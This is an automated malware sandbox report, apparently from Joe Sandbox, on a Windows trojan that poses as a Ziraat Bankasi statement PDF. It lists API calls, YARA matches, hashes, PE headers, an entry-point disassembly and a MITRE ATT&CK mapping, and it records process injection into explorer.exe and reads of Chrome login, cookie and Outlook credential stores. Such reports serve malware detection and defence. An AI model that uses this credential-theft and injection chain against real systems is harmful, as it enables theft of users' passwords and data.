          Source: explorer.exe, 00000003.00000000.261361642.0000000000B10000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000002.513327630.0000000000B10000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program Manager
          Source: explorer.exe, 00000003.00000002.521361155.00000000056F0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.270321034.0000000007B83000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.261361642.0000000000B10000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000003.00000002.512770295.00000000004C8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.261361642.0000000000B10000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.261069205.00000000004C8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000003.00000000.261361642.0000000000B10000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000002.513327630.0000000000B10000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
          Source: C:\Users\user\AppData\Local\Temp\oaqcoreqiw.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,1_2_010B4563
          Source: C:\Users\user\AppData\Local\Temp\oaqcoreqiw.exeCode function: GetLocaleInfoEx,__wcsnicmp,_TestDefaultCountry,_TestDefaultCountry,1_2_010BA972
          Source: C:\Users\user\AppData\Local\Temp\oaqcoreqiw.exeCode function: EnumSystemLocalesEx,1_2_010AF43E
          Source: C:\Users\user\AppData\Local\Temp\oaqcoreqiw.exeCode function: GetLocaleInfoEx,1_2_010AF473
          Source: C:\Users\user\AppData\Local\Temp\oaqcoreqiw.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,_free,_free,_free,InterlockedDecrement,InterlockedDecrement,_free,_free,1_2_010B3B1E
          Source: C:\Users\user\AppData\Local\Temp\oaqcoreqiw.exeCode function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__calloc_crt,_free,1_2_010A8F16
          Source: C:\Users\user\AppData\Local\Temp\oaqcoreqiw.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,_free,_free,InterlockedDecrement,InterlockedDecrement,_free,_free,1_2_010B3F27
          Source: C:\Users\user\AppData\Local\Temp\oaqcoreqiw.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,1_2_010AF3C6
          Source: C:\Users\user\AppData\Local\Temp\oaqcoreqiw.exeCode function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtLCMapStringA,___crtLCMapStringA,___crtGetStringTypeW,_memmove,_memmove,_memmove,InterlockedDecrement,_free,_free,_free,_free,_free,_free,_free,_free,_free,InterlockedDecrement,1_2_010B723D
          Source: C:\Users\user\AppData\Local\Temp\oaqcoreqiw.exeCode function: GetLocaleInfoEx,__wcsnicmp,_TestDefaultCountry,_TestDefaultCountry,2_2_010BA972
          Source: C:\Users\user\AppData\Local\Temp\oaqcoreqiw.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,_free,_free,_free,InterlockedDecrement,InterlockedDecrement,_free,_free,2_2_010B3B1E
          Source: C:\Users\user\AppData\Local\Temp\oaqcoreqiw.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,2_2_010AF3C6
          Source: C:\Users\user\AppData\Local\Temp\oaqcoreqiw.exeCode function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtLCMapStringA,___crtLCMapStringA,___crtGetStringTypeW,_memmove,_memmove,_memmove,InterlockedDecrement,_free,_free,_free,_free,_free,_free,_free,_free,_free,InterlockedDecrement,2_2_010B723D
          Source: C:\Users\user\AppData\Local\Temp\oaqcoreqiw.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,2_2_010B4563
          Source: C:\Users\user\AppData\Local\Temp\oaqcoreqiw.exeCode function: EnumSystemLocalesEx,2_2_010AF43E
          Source: C:\Users\user\AppData\Local\Temp\oaqcoreqiw.exeCode function: GetLocaleInfoEx,2_2_010AF473
          Source: C:\Users\user\AppData\Local\Temp\oaqcoreqiw.exeCode function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__calloc_crt,_free,2_2_010A8F16
          Source: C:\Users\user\AppData\Local\Temp\oaqcoreqiw.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,_free,_free,InterlockedDecrement,InterlockedDecrement,_free,_free,2_2_010B3F27
          Source: C:\Users\user\AppData\Local\Temp\oaqcoreqiw.exeCode function: 1_2_010AE2E5 cpuid 1_2_010AE2E5
          Source: C:\Users\user\AppData\Local\Temp\oaqcoreqiw.exeCode function: 1_2_010A2150 GetProcessHeap,GetLocalTime,GetTimeFormatW,SendMessageW,SendMessageW,SendMessageW,GetDateFormatW,SendMessageW,1_2_010A2150
          Source: C:\Users\user\Desktop\T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exeCode function: 0_2_00403640 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403640

          Stealing of Sensitive Information

          Source: Yara match File source: 2.2.oaqcoreqiw.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match File source: 2.2.oaqcoreqiw.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match File source: 00000002.00000002.303606664.0000000000F10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 00000002.00000002.303417878.0000000000DC0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 00000009.00000002.513151308.0000000002BA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 00000009.00000002.512971640.0000000000B30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 00000009.00000002.513376211.0000000002EA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 00000002.00000002.303227633.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: C:\Windows\SysWOW64\wlanext.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\
          Source: C:\Windows\SysWOW64\wlanext.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
          Source: C:\Windows\SysWOW64\wlanext.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
          Source: C:\Windows\SysWOW64\wlanext.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
          Source: C:\Windows\SysWOW64\wlanext.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
          Source: C:\Windows\SysWOW64\wlanext.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
          Source: C:\Windows\SysWOW64\wlanext.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies

          Remote Access Functionality

          Source: Yara match File source: 2.2.oaqcoreqiw.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match File source: 2.2.oaqcoreqiw.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match File source: 00000002.00000002.303606664.0000000000F10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 00000002.00000002.303417878.0000000000DC0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 00000009.00000002.513151308.0000000002BA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 00000009.00000002.512971640.0000000000B30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 00000009.00000002.513376211.0000000002EA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 00000002.00000002.303227633.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

          Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise
          Execution: 1 Native API; 1 Shared Modules; 2 Command and Scripting Interpreter; At (Windows); Cron; Launchd; Scheduled Task; Command and Scripting Interpreter
          Persistence: Path Interception; Boot or Logon Initialization Scripts; Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common; Startup Items; Scheduled Task/Job
          Privilege Escalation: 1 Access Token Manipulation; 512 Process Injection; Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common; Startup Items; Scheduled Task/Job
          Defense Evasion: 1 Deobfuscate/Decode Files or Information; 2 Obfuscated Files or Information; 1 Software Packing; 1 Masquerading; 2 Virtualization/Sandbox Evasion; 1 Access Token Manipulation; 512 Process Injection; Indicator Removal from Tools
          Credential Access: 1 OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem
          Discovery: 1 System Time Discovery; 2 File and Directory Discovery; 25 System Information Discovery; 141 Security Software Discovery; 2 Virtualization/Sandbox Evasion; 2 Process Discovery; 1 Application Window Discovery; 1 Remote System Discovery
          Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Shared Webroot
          Collection: 1 Archive Collected Data; 1 Data from Local System; 1 Email Collection; 1 Clipboard Data; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking
          Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol
          Command and Control: 3 Ingress Tool Transfer; 1 Encrypted Channel; 4 Non-Application Layer Protocol; 14 Application Layer Protocol; Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol
          Network Effects: Eavesdrop on Insecure Network Communication; Exploit SS7 to Redirect Phone Calls/SMS; Exploit SS7 to Track Device Location; SIM Card Swap; Manipulate Device Communication; Jamming or Denial of Service; Rogue Wi-Fi Access Points; Downgrade to Insecure Protocols
          Remote Service Effects: Remotely Track Device Without Authorization; Remotely Wipe Data Without Authorization; Obtain Device Cloud Backups
          Impact: 1 System Shutdown/Reboot; Device Lockout; Delete Device Data; Carrier Billing Fraud; Manipulate App Store Rankings or Ratings; Abuse Accessibility Features; Data Encrypted for Impact; Generate Fraudulent Advertising Revenue
          [Behavior graph, ID: 808219. Sample: T.C.Ziraat Bankasi A.S_Ekst... Startdate: 15/02/2023. Architecture: WINDOWS. Score: 100. Process chain: T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exe (started) drops and starts oaqcoreqiw.exe, which starts a second oaqcoreqiw.exe, which is injected into explorer.exe, which starts wlanext.exe.]

          Source | Detection | Scanner | Label
          T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exe | 36% | ReversingLabs | Win32.Trojan.Woreflint
          T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exe | 39% | Virustotal |
          T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exe | 100% | Joe Sandbox ML |

          Source | Detection | Scanner | Label
          C:\Users\user\AppData\Local\Temp\oaqcoreqiw.exe | 13% | ReversingLabs |

          Source | Detection | Scanner | Label
          2.2.oaqcoreqiw.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
          1.2.oaqcoreqiw.exe.1010000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen

          No Antivirus matches

          Joe Sandbox Version: 36.0.0 Rainbow Opal
          Analysis ID: 808219
          Start date and time: 2023-02-15 08:40:11 +01:00
          Joe Sandbox Product: CloudBasic
          Overall analysis duration: 0h 11m 46s
          Hypervisor based Inspection enabled: false
          Report type: full
          Cookbook file name: default.jbs
          Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
          Number of analysed new started processes analysed: 13
          Number of new started drivers analysed: 0
          Number of existing processes analysed: 0
          Number of existing drivers analysed: 0
          Number of injected processes analysed: 1
          Technologies:
          • HCA enabled
          • EGA enabled
          • HDC enabled
          • AMSI enabled
          Analysis Mode: default
          Analysis stop reason: Timeout
          Sample file name: T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exe
          Detection: MAL
          Classification: mal100.troj.spyw.evad.winEXE@7/5@7/5
          EGA Information:
          • Successful, ratio: 100%
          HDC Information:
          • Successful, ratio: 68.1% (good quality ratio 62.8%)
          • Quality average: 74.7%
          • Quality standard deviation: 31.9%
          HCA Information:
          • Successful, ratio: 100%
          • Number of executed functions: 58
          • Number of non-executed functions: 103
          Cookbook Comments:
          • Found application associated with file extension: .exe
          • Exclude process from analysis (whitelisted): MpCmdRun.exe, SgrmBroker.exe, conhost.exe, svchost.exe
          • Excluded domains from analysis (whitelisted): www.bing.com, client.wns.windows.com, fs.microsoft.com, ctldl.windowsupdate.com
          • Not all processes were analyzed, report is missing behavior information
          • Report creation exceeded maximum time and may have missing disassembly code information.
          • Report size getting too big, too many NtOpenKeyEx calls found.
          • Report size getting too big, too many NtProtectVirtualMemory calls found.
          • Report size getting too big, too many NtQueryValueKey calls found.

          Time | Type | Description
          08:41:31 | API Interceptor | 601x Sleep call for process: explorer.exe modified
                                                 Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context
                                                 Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context
                                                 Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context
                                                No context
                                                No context
                                                Process:C:\Windows\SysWOW64\wlanext.exe
                                                File Type:SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 3, database pages 45, cookie 0x3d, schema 4, UTF-8, version-valid-for 3
                                                Category:modified
                                                Size (bytes):94208
                                                Entropy (8bit):1.2889923589460437
                                                Encrypted:false
                                                SSDEEP:192:Qo1/8dpUXbSzTPJP/6oVuss8Ewn7PrH944:QS/inXrVuss8Ewn7b944
                                                MD5:7901DD9DF50A993306401B7360977746
                                                SHA1:E5BA33E47A3A76CC009EC1D63C5D1A810BE40521
                                                SHA-256:1019C8ADA4DA9DEF665F59DB191CA3A613F954C12813BE5907E1F5CB91C09BE9
                                                SHA-512:90C785D22D0D7F5DA90D52B14010719A5554BB5A7F0029C3F4E11A97AD72A7A600D846174C7B40D47D24B0995CDBAC21E255EC63AC9C07CF6E106572EA181DD5
                                                Malicious:false
                                                Reputation:moderate, very likely benign file
                                                Process:C:\Users\user\Desktop\T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):367911
                                                Entropy (8bit):7.525255780260812
                                                Encrypted:false
                                                SSDEEP:6144:/pfGijQ4KO7P7VrqEOkyOVUdnMXHD/MmJcfSQ3ZM/F1pEmi:ZJj3K2P7MEszSYma68e1pE
                                                MD5:BEF07EC204E47A9FED9CE296E43C23A8
                                                SHA1:81B4963AF5114E7B3F2CE1E5F34FD4EBB98AE2D8
                                                SHA-256:2370C31372DD27C2E5EB7F1A355B891D71175FF257512CF57D5A7A14291226D9
                                                SHA-512:5A2A5FCB494BFFACE5ECCB2B19AAA65DE2F087A9893BBACDF480822C6FA82004B303ABB8B91F1A4A692CEBDEDF996E0A99F5624B4206FEE509165793F9E4C461
                                                Malicious:false
                                                Reputation:low
                                                Process:C:\Users\user\Desktop\T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exe
                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                Category:modified
                                                Size (bytes):143360
                                                Entropy (8bit):6.284693009364011
                                                Encrypted:false
                                                SSDEEP:3072:OmJzYfS9Mme73ZMhVF1pv7m9tVQvIE8Zi:OmJcfSQ3ZM/F1pEmi
                                                MD5:7719839B64AEF3F35ABECB784C0BDB46
                                                SHA1:9EC0C959D4F3CF17C1E18CFD7C9FCF26909DBD0D
                                                SHA-256:41B47539D9346C769795483939F233FC59216F39215A2AB8FF01D6042E66A18E
                                                SHA-512:B07F8B56253924FF7BE8A626C74D631B4201E55E1E208575B2F8BFAABA7CB8C926A8488EE0DC12C3697EBE53B8751ADD8B09179C6A17F52A3D0F393C32A0D69D
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: ReversingLabs, Detection: 13%
                                                Reputation:low
                                                Process:C:\Users\user\Desktop\T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):210630
                                                Entropy (8bit):7.998807401765086
                                                Encrypted:true
                                                SSDEEP:3072:sPhff9ccD8Y0B4OJfOCjQlpP+cZPGw9e4LXC+FgVVobx1+GvOMJYpOIARCd58r0j:spfGijQ4KO7P7VrqEOkyOVUdnMXHDM
                                                MD5:1DFD9152477BAEB550B5554F854827B7
                                                SHA1:F952FD15E9E57752B5943EC8B97DD171762F8899
                                                SHA-256:CFA006C9056E7F5CE609B08EAC10DA24424A6CFBB8045B8F3EBC6C0A02B1100D
                                                SHA-512:DAC5969EA31606D6FED42FCDD67D87F8F27C066DB2779E281138BABC7D04B2FA4BC7035AFB3A2ACCFFB3A4CF1D227D5933718E93FDB578503655D72F8E54838A
                                                Malicious:false
                                                Process:C:\Users\user\Desktop\T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):5555
                                                Entropy (8bit):7.175875004069187
                                                Encrypted:false
                                                SSDEEP:96:Farc6oYxg/DrYu3k2XO5oSwY0p1V/FajFAEKf2kSIxGTIgOedwIFcf8m6t+McoQe:FarcR9/hX1S94BcjbBIx7gH1cUmSBQiF
                                                MD5:87643966A5A0CFF0F8A35513D5DE68CE
                                                SHA1:A6B4F982A8B24919DF537FE08351C1052E80E1B3
                                                SHA-256:6DB6E412814A1E393C3E9A9E7C90B7DDB8AFA2A3BCC74A59519EA538F69EE71A
                                                SHA-512:6418D140BCA12A4D599511519ACB9FD01324B888D4FA13F4152180C000D10E3CA416040F281185C51B146DCBFFDE24A9AA139419D799846E717A81788C2997ED
                                                Malicious:false
                                                File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                Entropy (8bit):7.930644057973553
                                                TrID:
                                                • Win32 Executable (generic) a (10002005/4) 99.96%
                                                • Generic Win/DOS Executable (2004/3) 0.02%
                                                • DOS Executable Generic (2002/1) 0.02%
                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                File name:T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exe
                                                File size:311919
                                                MD5:d668ae995548e2dc9b3193cb59ac9c02
                                                SHA1:9419fbd2082f2ac33dd07c457e20839669de6ee7
                                                SHA256:5f2de407396cfb921e5db52d5efb0fbfd44e7257630b079e02f83a1ed61ab4b4
                                                SHA512:93cfb30e2a7e8ed14fe70a0a886438e548ba2b55e198cf8d7653625c03080fb69799f1a1157bd5bcd862e57ed872847d6ec04a4ad2a6a0ccc49fc21c273c20b0
                                                SSDEEP:6144:/Ya6S2FIyqjrz3U+nPkxJ7x+ReF8c5Ao73B1hI3Z378H7qvXNpWYGxN:/YczblP+Jt+W5AozBDio7GXNpAN
                                                TLSH:E264120B3BC5C0A7EC668B310EB54F8A9EB68C156D7D815B27D49E1D7F23580C62E362
                                                Icon Hash:b2a88c96b2ca6a72
                                                Entrypoint:0x403640
                                                Entrypoint Section:.text
                                                Digitally signed:false
                                                Imagebase:0x400000
                                                Subsystem:windows gui
                                                Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                Time Stamp:0x614F9B1F [Sat Sep 25 21:56:47 2021 UTC]
                                                TLS Callbacks:
                                                CLR (.Net) Version:
                                                OS Version Major:4
                                                OS Version Minor:0
                                                File Version Major:4
                                                File Version Minor:0
                                                Subsystem Version Major:4
                                                Subsystem Version Minor:0
                                                Import Hash:61259b55b8912888e90f516ca08dc514
                                                Instruction
                                                push ebp
                                                mov ebp, esp
                                                sub esp, 000003F4h
                                                push ebx
                                                push esi
                                                push edi
                                                push 00000020h
                                                pop edi
                                                xor ebx, ebx
                                                push 00008001h
                                                mov dword ptr [ebp-14h], ebx
                                                mov dword ptr [ebp-04h], 0040A230h
                                                mov dword ptr [ebp-10h], ebx
                                                call dword ptr [004080C8h]
                                                mov esi, dword ptr [004080CCh]
                                                lea eax, dword ptr [ebp-00000140h]
                                                push eax
                                                mov dword ptr [ebp-0000012Ch], ebx
                                                mov dword ptr [ebp-2Ch], ebx
                                                mov dword ptr [ebp-28h], ebx
                                                mov dword ptr [ebp-00000140h], 0000011Ch
                                                call esi
                                                test eax, eax
                                                jne 00007EFEC869083Ah
                                                lea eax, dword ptr [ebp-00000140h]
                                                mov dword ptr [ebp-00000140h], 00000114h
                                                push eax
                                                call esi
                                                mov ax, word ptr [ebp-0000012Ch]
                                                mov ecx, dword ptr [ebp-00000112h]
                                                sub ax, 00000053h
                                                add ecx, FFFFFFD0h
                                                neg ax
                                                sbb eax, eax
                                                mov byte ptr [ebp-26h], 00000004h
                                                not eax
                                                and eax, ecx
                                                mov word ptr [ebp-2Ch], ax
                                                cmp dword ptr [ebp-0000013Ch], 0Ah
                                                jnc 00007EFEC869080Ah
                                                and word ptr [ebp-00000132h], 0000h
                                                mov eax, dword ptr [ebp-00000134h]
                                                movzx ecx, byte ptr [ebp-00000138h]
                                                mov dword ptr [0042A318h], eax
                                                xor eax, eax
                                                mov ah, byte ptr [ebp-0000013Ch]
                                                movzx eax, ax
                                                or eax, ecx
                                                xor ecx, ecx
                                                mov ch, byte ptr [ebp-2Ch]
                                                movzx ecx, cx
                                                shl eax, 10h
                                                or eax, ecx
                                                Programming Language:
                                                • [EXP] VC++ 6.0 SP5 build 8804
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x8504 | 0xa0 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x3b000 | 0xce0 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x8000 | 0x2b0 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x6676 | 0x6800 | False | 0.6568134014423077 | data | 6.4174599871908855 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x8000 | 0x139a | 0x1400 | False | 0.4498046875 | data | 5.141066817170598 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0xa000 | 0x20378 | 0x600 | False | 0.509765625 | data | 4.110582127654237 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
